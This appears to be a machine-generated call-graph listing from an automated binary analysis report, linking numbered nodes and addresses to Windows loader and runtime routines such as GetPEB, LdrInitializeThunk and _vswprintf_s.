17d1765 18730 1853c60 14 API calls 18729->18730 18733 17d1773 18729->18733 18731 181562b 18730->18731 18731->18733 19271 17e96e0 LdrInitializeThunk 18731->19271 18733->18563 18735 17cbc24 18734->18735 18736 17cbc5f 18735->18736 18932 186a80d 18735->18932 18736->18725 18746 17ca249 18739->18746 18740 17ca265 19018 17e9660 LdrInitializeThunk 18740->19018 18742 17ca27e 18743 1811db5 GetPEB 18742->18743 18745 17c7d50 GetPEB 18742->18745 18748 1811de4 18743->18748 18749 1811dc7 GetPEB 18743->18749 18744 1811c9e 18747 186a80d 28 API calls 18744->18747 18750 17ca28d 18745->18750 18746->18740 18746->18744 18751 1811cb0 18747->18751 18753 17ab150 _vswprintf_s 12 API calls 18748->18753 18752 17ab150 _vswprintf_s 12 API calls 18749->18752 18754 17ca29a 18750->18754 18755 1811cb8 GetPEB 18750->18755 18751->18725 18756 1811de1 18752->18756 18753->18756 18757 17ca2a5 18754->18757 18758 1811ccb GetPEB 18754->18758 18755->18758 18759 17ab150 _vswprintf_s 12 API calls 18756->18759 18760 17c7d50 GetPEB 18757->18760 18758->18757 18761 1811cde 18758->18761 18762 1811e03 18759->18762 18763 17ca2ba 18760->18763 19019 186138a 18761->19019 18765 1811cf4 GetPEB 18763->18765 18766 17ca2c2 18763->18766 18767 1811d07 GetPEB 18765->18767 18766->18767 18781 17ca2cd 18766->18781 18768 1811d1a 18767->18768 18767->18781 18770 17c7d50 GetPEB 18768->18770 18769 17c7d50 GetPEB 18771 17ca2d2 18769->18771 18772 1811d1f 18770->18772 18773 1811d51 GetPEB 18771->18773 18774 17ca2df 18771->18774 18775 1811d23 GetPEB 18772->18775 18776 1811d32 18772->18776 18773->18774 18778 17c7d50 GetPEB 18774->18778 18780 17ca2ea 18774->18780 18775->18776 19027 1861582 18776->19027 18782 1811d69 18778->18782 18779 17ca2fb 18779->18725 18780->18743 18780->18779 18781->18769 18783 1811d6d GetPEB 18782->18783 18784 1811d7c 18782->18784 18783->18784 18785 1861582 12 API calls 18784->18785 18785->18780 18787 17ca337 18786->18787 18790 17ca42d 18786->18790 18787->18790 18842 17ca3c6 18787->18842 19031 17c99bf 18787->19031 18789 17ca830 32 API calls 18792 17ca3bd 18789->18792 18793 17ca620 18790->18793 18803 17ca440 18790->18803 18792->18725 18798 17ca62d 18793->18798 18800 1811e6c GetPEB 18793->18800 18794 17ca3f8 18794->18790 18802 17a9373 28 API calls 18794->18802 18795 17ca396 19095 17ca830 18795->19095 18796 17ca4e5 18806 18120c2 GetPEB 18796->18806 18856 17ca4ed 18796->18856 18801 17ca65b 18798->18801 18808 1811eca 18798->18808 18804 1811e95 18800->18804 18805 1811e78 GetPEB 18800->18805 18807 17d174b 14 API calls 18801->18807 18802->18790 18803->18796 18803->18808 18820 17d174b 14 API calls 18803->18820 18831 17ca4fb 18803->18831 18803->18842 18810 17ab150 _vswprintf_s 12 API calls 18804->18810 18809 17ab150 _vswprintf_s 12 API calls 18805->18809 18813 18120d5 GetPEB 18806->18813 18811 17ca66e 18807->18811 18818 1812240 GetPEB 18808->18818 18808->18842 18812 1811e92 18809->18812 18810->18812 18815 17ca676 18811->18815 18816 1811ede 18811->18816 18821 17ab150 _vswprintf_s 12 API calls 18812->18821 18819 18120ea 18813->18819 18813->18831 18822 17c7d50 GetPEB 18815->18822 18830 17cb73d 32 API calls 18816->18830 18816->18842 18817 17ca594 19124 17cb73d 18817->19124 18823 1812269 18818->18823 18824 181224c GetPEB 18818->18824 18826 18614fb 14 API calls 18819->18826 18827 17ca4d8 18820->18827 18828 1811eaa 18821->18828 18829 17ca67b 18822->18829 18834 17ab150 _vswprintf_s 12 API calls 18823->18834 18833 17ab150 _vswprintf_s 12 API calls 18824->18833 18826->18831 18827->18816 18836 17ca4e0 18827->18836 18828->18798 18839 1862073 28 API calls 18828->18839 18840 1811f11 GetPEB 18829->18840 18841 17ca688 18829->18841 18830->18842 18831->18817 18832 17ca55f 18831->18832 18837 1812109 GetPEB 18831->18837 18843 1812162 18832->18843 18850 17ca584 18832->18850 18844 1812266 18833->18844 18834->18844 18838 17c7d50 GetPEB 18836->18838 18846 1812131 18837->18846 18847 1812114 GetPEB 18837->18847 18838->18796 18839->18798 18848 1811f24 GetPEB 18840->18848 18841->18848 18849 17ca693 18841->18849 18842->18789 18860 186a80d 28 API calls 18843->18860 18851 17ab150 _vswprintf_s 12 API calls 18844->18851 18845 17ca830 32 API calls 18852 17ca5c1 18845->18852 18857 17ab150 _vswprintf_s 12 API calls 18846->18857 18855 17ab150 _vswprintf_s 12 API calls 18847->18855 18848->18849 18859 1811f37 18848->18859 19148 17a9373 18849->19148 18858 17ca830 32 API calls 18850->18858 18853 181227e 18851->18853 18854 17c7d50 GetPEB 18852->18854 18853->18842 18865 1862073 28 API calls 18853->18865 18861 17ca5c6 18854->18861 18862 181212e 18855->18862 18856->18813 18856->18831 18857->18862 18858->18817 19169 18614fb 18859->19169 18860->18817 18866 18121a0 GetPEB 18861->18866 18867 17ca5d3 18861->18867 18868 17ab150 _vswprintf_s 12 API calls 18862->18868 18865->18842 18870 18121b3 GetPEB 18866->18870 18867->18870 18871 17ca5de 18867->18871 18872 1812146 18868->18872 18870->18871 18875 18121c8 18870->18875 18874 17c7d50 GetPEB 18871->18874 18872->18832 18878 1862073 28 API calls 18872->18878 18876 17ca5e3 18874->18876 18877 17c7d50 GetPEB 18875->18877 18880 1812201 GetPEB 18876->18880 18881 17ca5f0 18876->18881 18882 18121cd 18877->18882 18878->18832 18879 17ca77d 18884 17c7d50 GetPEB 18879->18884 18880->18881 18881->18792 18891 17c7d50 GetPEB 18881->18891 18885 18121d1 GetPEB 18882->18885 18886 18121e0 18882->18886 18888 17ca787 18884->18888 18885->18886 18889 1861411 12 API calls 18886->18889 18887 17ca74e 18892 17ca76d 18887->18892 18898 1811faf 18887->18898 18893 17ca78f 18888->18893 18894 1811fea GetPEB 18888->18894 18889->18871 18890 1811f56 GetPEB 18895 1811f61 GetPEB 18890->18895 18896 1811f7e 18890->18896 18897 1812219 18891->18897 18899 17ca830 32 API calls 18892->18899 18900 1811ffd GetPEB 18893->18900 18919 17ca79a 18893->18919 18894->18900 18901 17ab150 _vswprintf_s 12 API calls 18895->18901 18902 17ab150 _vswprintf_s 12 API calls 18896->18902 18897->18808 18922 1812075 18897->18922 18904 186a80d 28 API calls 18898->18904 18899->18879 18903 1812012 18900->18903 18900->18919 18906 1811f7b 18901->18906 18902->18906 18907 17c7d50 GetPEB 18903->18907 18904->18879 18905 17c7d50 GetPEB 18908 17ca79f 18905->18908 18912 17ab150 _vswprintf_s 12 API calls 18906->18912 18913 1812017 18907->18913 18909 1812051 GetPEB 18908->18909 18910 17ca7b1 18908->18910 18909->18910 18910->18792 18920 17c7d50 GetPEB 18910->18920 18911 1861411 12 API calls 18911->18792 18914 1811f93 18912->18914 18915 181201b GetPEB 18913->18915 18916 181202a 18913->18916 18914->18887 18918 1862073 28 API calls 18914->18918 18915->18916 19177 1861411 18916->19177 18918->18887 18919->18905 18921 1812066 18920->18921 18921->18922 18923 181206a GetPEB 18921->18923 18922->18911 18923->18922 18926 17ce13b 18924->18926 18925 17cab40 28 API calls 18925->18926 18926->18925 18927 17ce153 18926->18927 18927->18725 18929 17ce4c0 18928->18929 18930 186a80d 28 API calls 18929->18930 18931 17ce4db 18929->18931 18930->18931 18931->18725 18933 1812d06 18932->18933 18934 186a81c 18932->18934 18936 185ff41 18934->18936 18937 185ff4d _vswprintf_s 18936->18937 18939 185ffaf _vswprintf_s 18937->18939 18940 1862073 18937->18940 18939->18933 18950 185fd22 18940->18950 18942 186207d 18943 18620a4 18942->18943 18944 1862085 18942->18944 18946 18620be 18943->18946 18961 1861c06 GetPEB 18943->18961 18953 1858df1 18944->18953 18946->18939 18951 17e9670 _vswprintf_s LdrInitializeThunk 18950->18951 18952 185fd3d 18951->18952 18952->18942 19017 17fd0e8 18953->19017 18955 1858dfd GetPEB 18956 1858e10 18955->18956 18957 1835720 _vswprintf_s 12 API calls 18956->18957 18958 1858e2f _vswprintf_s 18956->18958 18957->18958 18959 17fd130 _vswprintf_s 12 API calls 18958->18959 18960 1858ebd 18959->18960 18960->18939 18962 1861c20 GetPEB 18961->18962 18963 1861c3d 18961->18963 18964 17ab150 _vswprintf_s 12 API calls 18962->18964 18965 17ab150 _vswprintf_s 12 API calls 18963->18965 18966 1861c3a 18964->18966 18965->18966 18967 17ab150 _vswprintf_s 12 API calls 18966->18967 18968 1861c5a GetPEB 18967->18968 18970 1861ce7 GetPEB 18968->18970 18971 1861d04 18968->18971 18972 17ab150 _vswprintf_s 12 API calls 18970->18972 18973 17ab150 _vswprintf_s 12 API calls 18971->18973 18974 1861d01 18972->18974 18973->18974 18975 17ab150 _vswprintf_s 12 API calls 18974->18975 18976 1861d1c 18975->18976 18977 1861d27 GetPEB 18976->18977 18978 1861d66 18976->18978 18979 1861d32 GetPEB 18977->18979 18980 1861d4f 18977->18980 18981 1861d70 GetPEB 18978->18981 18982 1861daf 18978->18982 18985 17ab150 _vswprintf_s 12 API calls 18979->18985 18986 17ab150 _vswprintf_s 12 API calls 18980->18986 18987 1861d7b GetPEB 18981->18987 18988 1861d98 18981->18988 18983 1861df8 18982->18983 18984 1861db9 GetPEB 18982->18984 18989 1861e0a GetPEB 18983->18989 18998 1861e52 GetPEB 18983->18998 18992 1861dc4 GetPEB 18984->18992 18993 1861de1 18984->18993 18991 1861d4c 18985->18991 18986->18991 18994 17ab150 _vswprintf_s 12 API calls 18987->18994 18990 17ab150 _vswprintf_s 12 API calls 18988->18990 18999 1861e15 GetPEB 18989->18999 19000 1861e32 18989->19000 18995 1861d95 18990->18995 19001 17ab150 _vswprintf_s 12 API calls 18991->19001 18996 17ab150 _vswprintf_s 12 API calls 18992->18996 18997 17ab150 _vswprintf_s 12 API calls 18993->18997 18994->18995 19002 17ab150 _vswprintf_s 12 API calls 18995->19002 19005 1861dde 18996->19005 18997->19005 19006 1861e5d GetPEB 18998->19006 19007 1861e7a 18998->19007 19003 17ab150 _vswprintf_s 12 API calls 18999->19003 19004 17ab150 _vswprintf_s 12 API calls 19000->19004 19001->18978 19002->18982 19010 1861e2f 19003->19010 19004->19010 19009 17ab150 _vswprintf_s 12 API calls 19005->19009 19011 17ab150 _vswprintf_s 12 API calls 19006->19011 19008 17ab150 _vswprintf_s 12 API calls 19007->19008 19012 1861e77 19008->19012 19009->18983 19013 17ab150 _vswprintf_s 12 API calls 19010->19013 19011->19012 19014 17ab150 _vswprintf_s 12 API calls 19012->19014 19015 1861e4f 19013->19015 19016 1861e90 GetPEB 19014->19016 19015->18998 19016->18946 19017->18955 19018->18742 19020 18613af _vswprintf_s 19019->19020 19021 17c7d50 GetPEB 19020->19021 19022 18613d2 19021->19022 19023 18613d6 GetPEB 19022->19023 19024 18613e6 _vswprintf_s 19022->19024 19023->19024 19025 17eb640 _vswprintf_s 12 API calls 19024->19025 19026 186140b 19025->19026 19026->18757 19028 18615bd _vswprintf_s 19027->19028 19029 17eb640 _vswprintf_s 12 API calls 19028->19029 19030 1861602 19029->19030 19030->18781 19033 17c99e5 19031->19033 19089 17c99f5 19031->19089 19032 17c9a6e 19034 17c9a7c 19032->19034 19035 1811466 19032->19035 19033->19032 19037 185fa2b 28 API calls 19033->19037 19033->19089 19036 181166a 19034->19036 19043 17c9a9d 19034->19043 19038 181159c 19035->19038 19044 1811487 19035->19044 19039 186a80d 28 API calls 19036->19039 19037->19032 19040 186a80d 28 API calls 19038->19040 19039->19089 19048 17c9b2b 19040->19048 19041 186a80d 28 API calls 19041->19089 19042 18114c0 19049 17ca229 39 API calls 19042->19049 19060 18114f2 19042->19060 19046 17c9ad7 19043->19046 19053 17cbc04 28 API calls 19043->19053 19044->19042 19054 17cbc04 28 API calls 19044->19054 19045 185fa2b 28 API calls 19045->19089 19047 17ca229 39 API calls 19046->19047 19055 17c9ae8 19046->19055 19050 17c9b27 19047->19050 19051 17ca309 82 API calls 19048->19051 19052 18114da 19049->19052 19050->19048 19050->19055 19051->19089 19056 18114de 19052->19056 19052->19060 19053->19046 19054->19042 19062 18115f9 GetPEB 19055->19062 19055->19089 19058 17ca309 82 API calls 19056->19058 19057 17c9a3d 19057->18794 19057->18795 19058->19048 19059 17ca229 39 API calls 19059->19089 19060->19048 19061 1811532 GetPEB 19060->19061 19063 181155d 19061->19063 19064 181153f GetPEB 19061->19064 19067 1811624 19062->19067 19068 1811606 GetPEB 19062->19068 19070 17ab150 _vswprintf_s 12 API calls 19063->19070 19069 17ab150 _vswprintf_s 12 API calls 19064->19069 19065 18118a7 19065->19057 19076 18118e7 GetPEB 19065->19076 19066 17cbc04 28 API calls 19066->19089 19072 17ab150 _vswprintf_s 12 API calls 19067->19072 19071 17ab150 _vswprintf_s 12 API calls 19068->19071 19074 181155a 19069->19074 19070->19074 19077 1811621 19071->19077 19072->19077 19073 17ca309 82 API calls 19073->19089 19078 17ab150 _vswprintf_s 12 API calls 19074->19078 19075 181179e GetPEB 19079 18117ab GetPEB 19075->19079 19075->19089 19080 1811912 19076->19080 19081 18118f4 GetPEB 19076->19081 19082 17ab150 _vswprintf_s 12 API calls 19077->19082 19083 181157c GetPEB 19078->19083 19084 17ab150 _vswprintf_s 12 API calls 19079->19084 19087 17ab150 _vswprintf_s 12 API calls 19080->19087 19086 17ab150 _vswprintf_s 12 API calls 19081->19086 19088 1811643 GetPEB 19082->19088 19083->19048 19084->19089 19085 17ab150 _vswprintf_s 12 API calls 19085->19089 19090 181190f 19086->19090 19087->19090 19088->19089 19089->19041 19089->19045 19089->19057 19089->19059 19089->19065 19089->19066 19089->19073 19089->19075 19089->19085 19091 17ab150 _vswprintf_s 12 API calls 19089->19091 19092 17ab150 _vswprintf_s 12 API calls 19090->19092 19093 18117e8 GetPEB 19091->19093 19094 1811931 GetPEB 19092->19094 19093->19089 19094->19057 19107 17ca850 19095->19107 19118 17ca39e 19095->19118 19096 18122bb GetPEB 19097 18122c7 GetPEB 19096->19097 19096->19107 19099 17ab150 _vswprintf_s 12 API calls 19097->19099 19098 186a80d 28 API calls 19098->19107 19099->19107 19100 1812385 19101 186a80d 28 API calls 19100->19101 19103 17caa3c 19101->19103 19108 18123cb GetPEB 19103->19108 19103->19118 19104 17ab150 12 API calls _vswprintf_s 19104->19107 19105 1812376 19109 186a80d 28 API calls 19105->19109 19106 1862073 28 API calls 19106->19107 19107->19096 19107->19098 19107->19100 19107->19103 19107->19104 19107->19105 19107->19106 19107->19118 19181 17cab40 19107->19181 19110 18123d7 GetPEB 19108->19110 19111 18123f6 19108->19111 19109->19100 19112 17ab150 _vswprintf_s 12 API calls 19110->19112 19113 17ab150 _vswprintf_s 12 API calls 19111->19113 19114 18123f1 19112->19114 19113->19114 19115 17ab150 _vswprintf_s 12 API calls 19114->19115 19116 181240d 19115->19116 19117 1862073 28 API calls 19116->19117 19116->19118 19117->19118 19118->18792 19119 17dabd8 19118->19119 19121 17dabf1 19119->19121 19120 17dac5f 19120->18792 19121->19120 19122 185fa2b 28 API calls 19121->19122 19189 17dac7b 19121->19189 19122->19121 19125 17cb77c 19124->19125 19126 17cb855 19124->19126 19128 1812bbf GetPEB 19125->19128 19129 17cb78e 19125->19129 19126->19125 19127 186a80d 28 API calls 19126->19127 19127->19125 19130 1812be8 19128->19130 19131 1812bcb GetPEB 19128->19131 19147 17cb7e2 19129->19147 19248 17cb8e4 19129->19248 19133 17ab150 _vswprintf_s 12 API calls 19130->19133 19132 17ab150 _vswprintf_s 12 API calls 19131->19132 19134 1812be5 19132->19134 19133->19134 19136 17ab150 _vswprintf_s 12 API calls 19134->19136 19138 1812bfd 19136->19138 19138->19129 19143 1862073 28 API calls 19138->19143 19139 1812c18 19141 186a80d 28 API calls 19139->19141 19140 17ca5b2 19140->18845 19141->19147 19142 186a80d 28 API calls 19144 1812c3e 19142->19144 19143->19129 19144->19144 19145 17cb7ca 19146 17ce4a0 28 API calls 19145->19146 19145->19147 19146->19147 19147->19140 19147->19142 19149 17a938f 19148->19149 19150 18037ee 19148->19150 19149->19150 19151 17a9397 19149->19151 19152 186a80d 28 API calls 19150->19152 19156 17a93c3 19151->19156 19262 17a93cc 19151->19262 19153 17a93ab 19152->19153 19155 186a80d 28 API calls 19153->19155 19153->19156 19155->19156 19157 17a9819 19156->19157 19158 17a9829 19157->19158 19159 17a984c 19157->19159 19160 17cb8e4 30 API calls 19158->19160 19164 17a987b 19159->19164 19166 186a80d 28 API calls 19159->19166 19161 17a982e 19160->19161 19162 17a9839 19161->19162 19163 1803bbe 19161->19163 19266 17a988d 19162->19266 19165 186a80d 28 API calls 19163->19165 19164->18879 19164->18887 19164->18890 19165->19159 19168 1803be4 19166->19168 19168->19168 19170 1861520 _vswprintf_s 19169->19170 19171 17c7d50 GetPEB 19170->19171 19172 1861543 19171->19172 19173 1861547 GetPEB 19172->19173 19174 1861557 _vswprintf_s 19172->19174 19173->19174 19175 17eb640 _vswprintf_s 12 API calls 19174->19175 19176 186157c 19175->19176 19176->18849 19178 1861446 _vswprintf_s 19177->19178 19179 17eb640 _vswprintf_s 12 API calls 19178->19179 19180 186149a 19179->19180 19180->18919 19182 17cab6e 19181->19182 19188 17cabbb 19181->19188 19183 186a80d 28 API calls 19182->19183 19184 17cabd0 19182->19184 19182->19188 19183->19184 19185 186a80d 28 API calls 19184->19185 19186 17cac01 19184->19186 19185->19186 19187 186a80d 28 API calls 19186->19187 19186->19188 19187->19186 19188->19107 19190 17daca2 19189->19190 19192 17dad10 19189->19192 19222 17dacda 19190->19222 19234 17e96e0 LdrInitializeThunk 19190->19234 19194 17dad1e GetPEB 19192->19194 19235 1853c60 19192->19235 19196 17dad2c 19194->19196 19233 181a092 19194->19233 19200 17dad3c 19196->19200 19203 1819fa0 GetPEB 19196->19203 19198 181a0ba 19202 17ab150 _vswprintf_s 12 API calls 19198->19202 19199 181a09d GetPEB 19204 17ab150 _vswprintf_s 12 API calls 19199->19204 19206 1819fb3 GetPEB 19200->19206 19207 17dad47 GetPEB 19200->19207 19201 1819f90 19201->19194 19205 181a0b7 19202->19205 19203->19200 19204->19205 19210 17ab150 _vswprintf_s 12 API calls 19205->19210 19206->19207 19211 1819fc6 19206->19211 19208 1819fda 19207->19208 19209 17dad73 19207->19209 19208->19209 19213 1819fe3 GetPEB 19208->19213 19214 17dad7e GetPEB 19209->19214 19215 1819ff6 GetPEB 19209->19215 19210->19222 19212 18614fb 14 API calls 19211->19212 19216 1819fd5 19212->19216 19213->19209 19217 181a042 19214->19217 19218 17dad94 19214->19218 19215->19214 19219 181a009 19215->19219 19216->19207 19217->19218 19220 181a04b GetPEB 19217->19220 19218->19222 19224 17c7d50 GetPEB 19218->19224 19221 17c7d50 GetPEB 19219->19221 19220->19218 19223 181a00e 19221->19223 19222->19121 19225 181a021 19223->19225 19226 181a012 GetPEB 19223->19226 19228 181a063 19224->19228 19227 1861411 12 API calls 19225->19227 19226->19225 19229 181a03d 19227->19229 19230 181a067 GetPEB 19228->19230 19231 181a076 19228->19231 19229->19214 19230->19231 19232 1861411 12 API calls 19231->19232 19232->19233 19233->19198 19233->19199 19234->19192 19236 1819f74 19235->19236 19238 1853c78 19235->19238 19236->19194 19239 17e96e0 LdrInitializeThunk 19236->19239 19238->19236 19240 1853d40 19238->19240 19239->19201 19244 1853d7f 19240->19244 19241 1853da6 RtlDebugPrintTimes 19241->19244 19242 1853e55 19243 17eb640 _vswprintf_s 12 API calls 19242->19243 19246 1853e65 19243->19246 19244->19241 19247 1853e0c 19244->19247 19245 1853e37 GetPEB 19245->19247 19246->19236 19247->19242 19247->19245 19249 1812c43 19248->19249 19257 17cb8fa 19248->19257 19250 1812c56 GetPEB 19249->19250 19249->19257 19252 1812c62 GetPEB 19250->19252 19253 1812c7f 19250->19253 19251 17cb7bf 19251->19139 19251->19145 19254 17ab150 _vswprintf_s 12 API calls 19252->19254 19255 17ab150 _vswprintf_s 12 API calls 19253->19255 19256 1812c7c 19254->19256 19255->19256 19259 17ab150 _vswprintf_s 12 API calls 19256->19259 19257->19251 19258 17cab40 28 API calls 19257->19258 19258->19251 19260 1812c94 19259->19260 19260->19257 19261 1862073 28 API calls 19260->19261 19261->19257 19263 17a93e3 19262->19263 19265 17a93df 19262->19265 19264 17cbc04 28 API calls 19263->19264 19264->19265 19265->19153 19267 17a98a0 19266->19267 19268 17a98a4 19266->19268 19267->19159 19269 17ce4a0 28 API calls 19268->19269 19269->19267 19270->18729 19271->18733 19272->18626 19274 1823bf3 19273->19274 19275 1823c05 19273->19275 19277 1823c54 19274->19277 19275->18654 19280 17ee3a0 19277->19280 19283 17ee3bd 19280->19283 19282 17ee3b8 19282->19275 19284 17ee3cc 19283->19284 19285 17ee3e3 19283->19285 19286 17eb58e _vswprintf_s 12 API calls 19284->19286 19287 17eb58e _vswprintf_s 12 API calls 19285->19287 19288 17ee3d8 _vswprintf_s 19285->19288 19286->19288 19287->19288 19288->19282 17783 17dfab0 17784 17dfb14 17783->17784 17785 17dfac2 17783->17785 17819 17beef0 17785->17819 17787 17dfacd 17788 17dfadf 17787->17788 17791 17dfb18 17787->17791 17834 17beb70 17788->17834 17798 181bdcb 17791->17798 17824 17b6d90 17791->17824 17792 17dfafa GetPEB 17792->17784 17793 17dfb09 17792->17793 17840 17bff60 17793->17840 17797 181bea7 17799 17b76e2 GetPEB 17797->17799 17818 17dfc4b 17797->17818 17798->17797 17802 181be19 17798->17802 17860 17ab150 17798->17860 17799->17818 17800 17dfba7 17804 17dfbe4 17800->17804 17800->17818 17848 17dfd22 17800->17848 17802->17797 17863 17b75ce 17802->17863 17806 181bf17 17804->17806 17807 17dfc47 17804->17807 17804->17818 17808 17dfd22 GetPEB 17806->17808 17806->17818 17809 17dfd22 GetPEB 17807->17809 17807->17818 17811 181bf22 17808->17811 17812 17dfcb2 17809->17812 17810 181be54 17813 181be92 17810->17813 17810->17818 17867 17b76e2 17810->17867 17814 17dfd9b 3 API calls 17811->17814 17811->17818 17812->17818 17852 17dfd9b 17812->17852 17813->17797 17817 17b76e2 GetPEB 17813->17817 17814->17818 17817->17797 17820 17bef0c 17819->17820 17821 17bef21 17819->17821 17820->17787 17822 17bef29 17821->17822 17871 17bef40 17821->17871 17822->17787 17825 17b6dba 17824->17825 17833 17b6da4 17824->17833 18199 17e2e1c 17825->18199 17827 17b6dbf 17828 17beef0 27 API calls 17827->17828 17829 17b6dca 17828->17829 17830 17b6dde 17829->17830 18204 17adb60 17829->18204 17832 17beb70 34 API calls 17830->17832 17832->17833 17833->17798 17833->17800 17833->17818 17835 17beb9e 17834->17835 17836 17beb81 17834->17836 17835->17784 17835->17792 17836->17835 17838 17bebac 17836->17838 18322 183ff10 17836->18322 17838->17835 18316 17a4dc0 17838->18316 17841 17bff99 17840->17841 17842 17bff6d 17840->17842 17843 18788f5 34 API calls 17841->17843 17842->17841 17845 17bff80 GetPEB 17842->17845 17844 17bff94 17843->17844 17844->17784 17845->17841 17846 17bff8f 17845->17846 18424 17c0050 17846->18424 17849 17dfd3a 17848->17849 17851 17dfd31 _vswprintf_s 17848->17851 17849->17851 18460 17b7608 17849->18460 17851->17804 17853 17dfdba GetPEB 17852->17853 17854 17dfdcc 17852->17854 17853->17854 17855 181c0bd 17854->17855 17856 17dfdf2 17854->17856 17859 17dfdfc 17854->17859 17857 181c0d3 GetPEB 17855->17857 17855->17859 17858 17b76e2 GetPEB 17856->17858 17856->17859 17857->17859 17858->17859 17859->17818 17861 17ab171 _vswprintf_s 12 API calls 17860->17861 17862 17ab16e 17861->17862 17862->17802 17864 17b75db 17863->17864 17865 17b75eb 17863->17865 17864->17865 17866 17b7608 GetPEB 17864->17866 17865->17810 17866->17865 17868 17b76e6 17867->17868 17870 17b76fd 17867->17870 17869 17b76ec GetPEB 17868->17869 17868->17870 17869->17870 17870->17813 17872 17bf0bd 17871->17872 17874 17bef5d 17871->17874 17872->17874 17909 17a9080 17872->17909 17876 17bf042 17874->17876 17877 17bf071 17874->17877 17879 17a2d8a 17874->17879 17876->17877 17878 17bf053 GetPEB 17876->17878 17877->17820 17878->17877 17880 17a2db8 17879->17880 17887 17a2df1 _vswprintf_s 17879->17887 17881 17a2de7 17880->17881 17880->17887 17915 17a2e9f 17880->17915 17881->17887 17919 17d1624 17881->17919 17882 17ff9d0 GetPEB 17885 17ff9e3 GetPEB 17882->17885 17885->17887 17887->17882 17887->17885 17890 17a2e5a 17887->17890 17913 17c7d50 GetPEB 17887->17913 17926 183fe87 17887->17926 17933 183fdda 17887->17933 17939 183ffb9 17887->17939 17947 1835720 17887->17947 17891 17a2e61 17890->17891 17897 17a2e99 _vswprintf_s 17890->17897 17892 17a2e69 17891->17892 17893 17c7d50 GetPEB 17891->17893 17892->17874 17895 17ffa76 17893->17895 17898 17ffa8a 17895->17898 17899 17ffa7a GetPEB 17895->17899 17896 17a2ece 17896->17874 17897->17896 17962 17e95d0 LdrInitializeThunk 17897->17962 17898->17892 17902 17ffa97 GetPEB 17898->17902 17899->17898 17902->17892 17903 17ffaaa 17902->17903 17904 17c7d50 GetPEB 17903->17904 17905 17ffaaf 17904->17905 17906 17ffac3 17905->17906 17907 17ffab3 GetPEB 17905->17907 17906->17892 17950 1827016 17906->17950 17907->17906 17910 17a9098 17909->17910 17911 17a909e GetPEB 17909->17911 17910->17911 17912 17a90aa 17911->17912 17912->17874 17914 17c7d5d 17913->17914 17914->17887 17916 17a2ebb _vswprintf_s 17915->17916 17918 17a2ece 17916->17918 17963 17e95d0 LdrInitializeThunk 17916->17963 17918->17881 17964 17d16e0 17919->17964 17921 17d1630 17925 17d1691 17921->17925 17968 17d16c7 17921->17968 17923 17d165a 17923->17925 17975 17da185 17923->17975 17925->17887 17927 17c7d50 GetPEB 17926->17927 17928 183fec1 17927->17928 17929 183fec5 GetPEB 17928->17929 17930 183fed5 _vswprintf_s 17928->17930 17929->17930 18006 17eb640 17930->18006 17932 183fef8 17932->17887 17934 183fdff __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17933->17934 17935 1835720 _vswprintf_s 12 API calls 17934->17935 17936 183fe0f 17935->17936 17937 1835720 _vswprintf_s 12 API calls 17936->17937 17938 183fe39 17937->17938 17938->17887 17940 183ffc8 _vswprintf_s 17939->17940 18153 17de730 17940->18153 17942 1840067 _vswprintf_s 17944 17fd130 _vswprintf_s 12 API calls 17942->17944 17943 183ffd5 _vswprintf_s 17943->17942 17945 1830c30 _vswprintf_s 12 API calls 17943->17945 17946 184009a 17944->17946 17945->17942 17946->17887 18159 17ab171 17947->18159 17951 1827052 17950->17951 17952 1827073 GetPEB 17951->17952 17957 1827084 17951->17957 17952->17957 17953 1827136 17955 17eb640 _vswprintf_s 12 API calls 17953->17955 17954 1827125 GetPEB 17954->17953 17956 1827147 17955->17956 17956->17892 17957->17953 17958 17c7d50 GetPEB 17957->17958 17961 1827101 _vswprintf_s 17957->17961 17959 18270ec 17958->17959 17960 18270f0 GetPEB 17959->17960 17959->17961 17960->17961 17961->17953 17961->17954 17962->17896 17963->17918 17965 17d16ed 17964->17965 17966 17d16f3 GetPEB 17965->17966 17967 17d16f1 17965->17967 17966->17967 17967->17921 17969 18155f4 17968->17969 17970 17d16da 17968->17970 17980 185bbf0 17969->17980 17970->17923 17974 181560a 17976 17da1a0 17975->17976 17977 17da192 17975->17977 17976->17977 17978 17da1b0 GetPEB 17976->17978 17977->17925 17979 17da1c1 17978->17979 17979->17925 17981 185bc12 17980->17981 17982 18155fb 17981->17982 17988 185c08a 17981->17988 17982->17974 17984 185bf33 17982->17984 17985 185bf4c 17984->17985 17987 185bf97 17985->17987 18001 185be9b 17985->18001 17987->17974 17989 185c0c6 17988->17989 17991 185c104 _vswprintf_s 17989->17991 17992 185bfdb 17989->17992 17991->17982 17994 185bfeb 17992->17994 17995 185bfef 17992->17995 17994->17991 17995->17994 17996 185bdfa 17995->17996 17997 185be17 17996->17997 17999 185be6d 17997->17999 18000 17e9660 LdrInitializeThunk 17997->18000 17999->17994 18000->17999 18002 185beb3 18001->18002 18003 185bf08 18002->18003 18005 17e9660 LdrInitializeThunk 18002->18005 18003->17987 18005->18003 18007 17eb64b 18006->18007 18008 17eb648 18006->18008 18011 185b590 18007->18011 18008->17932 18010 17eb74a _vswprintf_s 18010->17932 18014 185b260 18011->18014 18013 185b5a3 18013->18010 18072 17fd08c 18014->18072 18016 185b26c GetPEB 18017 185b279 GetPEB 18016->18017 18019 185b293 18017->18019 18020 185b54b 18019->18020 18021 185b48b 18019->18021 18022 185b2ba 18019->18022 18028 185b56b _vswprintf_s 18020->18028 18073 1830c30 18020->18073 18023 1835720 _vswprintf_s 10 API calls 18021->18023 18024 185b414 18022->18024 18025 185b2c6 18022->18025 18026 185b49e 18023->18026 18027 1835720 _vswprintf_s 10 API calls 18024->18027 18029 185b32d 18025->18029 18030 185b2ce 18025->18030 18036 1835720 _vswprintf_s 10 API calls 18026->18036 18031 185b427 18027->18031 18028->18013 18038 185b396 18029->18038 18044 185b34d 18029->18044 18068 185b2eb 18029->18068 18033 185b2f3 18030->18033 18034 185b2da 18030->18034 18037 1835720 _vswprintf_s 10 API calls 18031->18037 18035 1835720 _vswprintf_s 10 API calls 18033->18035 18039 1835720 _vswprintf_s 10 API calls 18034->18039 18040 185b302 18035->18040 18041 185b4c2 18036->18041 18043 185b43e 18037->18043 18042 1835720 _vswprintf_s 10 API calls 18038->18042 18039->18068 18047 1835720 _vswprintf_s 10 API calls 18040->18047 18048 185b4cc 18041->18048 18057 185b320 18041->18057 18049 185b3aa 18042->18049 18050 1835720 _vswprintf_s 10 API calls 18043->18050 18051 1835720 _vswprintf_s 10 API calls 18044->18051 18045 1835720 _vswprintf_s 10 API calls 18046 185b4fd 